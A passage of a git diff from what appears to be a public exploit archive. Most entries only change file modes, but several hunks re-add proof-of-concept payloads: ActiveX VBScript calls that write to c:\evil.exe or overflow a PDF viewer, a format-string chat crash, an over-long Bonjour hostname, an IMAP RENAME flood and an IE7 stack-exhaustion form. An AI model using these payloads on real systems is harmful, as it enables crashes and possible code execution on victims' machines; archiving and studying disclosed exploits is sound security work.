bstrInputFileName As String , ByVal bstrInputString As String )" memberName = "AppendStringToFile" progid = "HPISDataManagerLib.Datamgr" argCount = 2 arg1="c:\evil.exe" arg2=String("CSIS entered this") target.AppendStringToFile arg1 ,arg2 </script></job></package> \ No newline at end of file +<?XML version='1.0' standalone='yes' ?> <package><job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' /> <script language='vbscript'> targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll" prototype = "Sub AppendStringToFile ( ByVal bstrInputFileName As String , ByVal bstrInputString As String )" memberName = "AppendStringToFile" progid = "HPISDataManagerLib.Datamgr" argCount = 2 arg1="c:\evil.exe" arg2=String("CSIS entered this") target.AppendStringToFile arg1 ,arg2 </script></job></package> \ No newline at end of file diff --git a/platforms/windows/dos/31879.xml b/platforms/windows/dos/31879.xml old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31899.txt b/platforms/windows/dos/31899.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31934.txt b/platforms/windows/dos/31934.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/31964.txt b/platforms/windows/dos/31964.txt old mode 100755 new mode 100644 index b52074b01..8a15432ba --- a/platforms/windows/dos/31964.txt +++ b/platforms/windows/dos/31964.txt @@ -6,4 +6,4 @@ Exploiting this issue will allow attackers to execute arbitrary code with the pr When the following chat message is sent, the game client of every connected user will crash: -%5000000.x \ No newline at end of file +%5000000.x \ No newline at end of file diff --git a/platforms/windows/dos/3204.c b/platforms/windows/dos/3204.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/32229.txt b/platforms/windows/dos/32229.txt old mode 100755 new mode 100644 index 4f6eb3568..b1cf10fd4 --- a/platforms/windows/dos/32229.txt +++ b/platforms/windows/dos/32229.txt @@ -12,4 +12,4 @@ A03 CREATE AAAAAAA ... A97 RENAME AAAAA BBBBB A98 RENAME AAAAAA BBBBBB -A100 RENAME AAAAAAA BBBBBBB \ No newline at end of file +A100 RENAME AAAAAAA BBBBBBB \ No newline at end of file diff --git a/platforms/windows/dos/3224.c b/platforms/windows/dos/3224.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/32294.html b/platforms/windows/dos/32294.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/32332.txt b/platforms/windows/dos/32332.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/32350.txt b/platforms/windows/dos/32350.txt old mode 100755 new mode 100644 index 8e2506da4..1e16c281f --- a/platforms/windows/dos/32350.txt +++ b/platforms/windows/dos/32350.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue will allow attackers to crash the mDNSRespond Bonjour for Windows 1.0.4 is vulnerable. -http://diechromedie.1234567890123456789012345678901234567890123456789012345678901234.local/ \ No newline at end of file +http://diechromedie.1234567890123456789012345678901234567890123456789012345678901234.local/ \ No newline at end of file diff --git a/platforms/windows/dos/32356.txt b/platforms/windows/dos/32356.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/324.txt b/platforms/windows/dos/324.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/32420.c b/platforms/windows/dos/32420.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/32428.txt b/platforms/windows/dos/32428.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/32435.c b/platforms/windows/dos/32435.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/32481.txt b/platforms/windows/dos/32481.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/32550.html b/platforms/windows/dos/32550.html old mode 100755 new mode 100644 index 914d93c43..77cb43a0e --- a/platforms/windows/dos/32550.html +++ b/platforms/windows/dos/32550.html @@ -6,4 +6,4 @@ A successful attack allows a remote attacker to crash the application using the Microsoft DebugDiag 1.0 is vulnerable; other versions may also be affected. -<body> <object classid='clsid:7233D6F8-AD31-440F-BAF0-9E7A292A53DA' id='target' /> </object> <script language='vbscript'> arg1=-2147483647 target.GetEntryPointForThread arg1 </script> </body> \ No newline at end of file +<body> <object classid='clsid:7233D6F8-AD31-440F-BAF0-9E7A292A53DA' id='target' /> </object> <script language='vbscript'> arg1=-2147483647 target.GetEntryPointForThread arg1 </script> </body> \ No newline at end of file diff --git a/platforms/windows/dos/32572.txt b/platforms/windows/dos/32572.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/32573.txt b/platforms/windows/dos/32573.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/32587.txt b/platforms/windows/dos/32587.txt old mode 100755 new mode 100644 index b93a49055..5b1d7ff93 --- a/platforms/windows/dos/32587.txt +++ b/platforms/windows/dos/32587.txt @@ -4,4 +4,4 @@ The VeryPDF PDFView ActiveX control is prone to a heap buffer-overflow vulnerabi An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. -<object classid='clsid:433268D7-2CD4-43E6-AA24-2188672E7252' id='target'></object> <script language='vbscript'> Sub Boom buff = String(1006, "A") target.OpenPDF buff, 1, 1 End Sub </script> <input type=button onclick=Boom() value='Boom?'> \ No newline at end of file +<object classid='clsid:433268D7-2CD4-43E6-AA24-2188672E7252' id='target'></object> <script language='vbscript'> Sub Boom buff = String(1006, "A") target.OpenPDF buff, 1, 1 End Sub </script> <input type=button onclick=Boom() value='Boom?'> \ No newline at end of file diff --git a/platforms/windows/dos/32706.txt b/platforms/windows/dos/32706.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/32707.txt b/platforms/windows/dos/32707.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3272.html b/platforms/windows/dos/3272.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/32755.c b/platforms/windows/dos/32755.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3276.cpp b/platforms/windows/dos/3276.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/32763.html b/platforms/windows/dos/32763.html old mode 100755 new mode 100644 index 622d1d425..957f7a0a5 --- a/platforms/windows/dos/32763.html +++ b/platforms/windows/dos/32763.html @@ -8,4 +8,4 @@ Internet Explorer 7 on Windows XP SP3 is vulnerable; other versions running on d NOTE: This issue was originally published as a buffer-overflow vulnerability that could result in remote code execution. Further analysis and vendor reports, however, suggest that exploiting this issue may cause only a denial-of-service condition from stack exhaustion. This vulnerability cannot be exploited to execute arbitrary code. -<h1>Internet explorer 7.0 stack overflow</h1> (this work only in window xp) <form name="input" action="http://A" method="get"> <input type="text" name="A" value="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC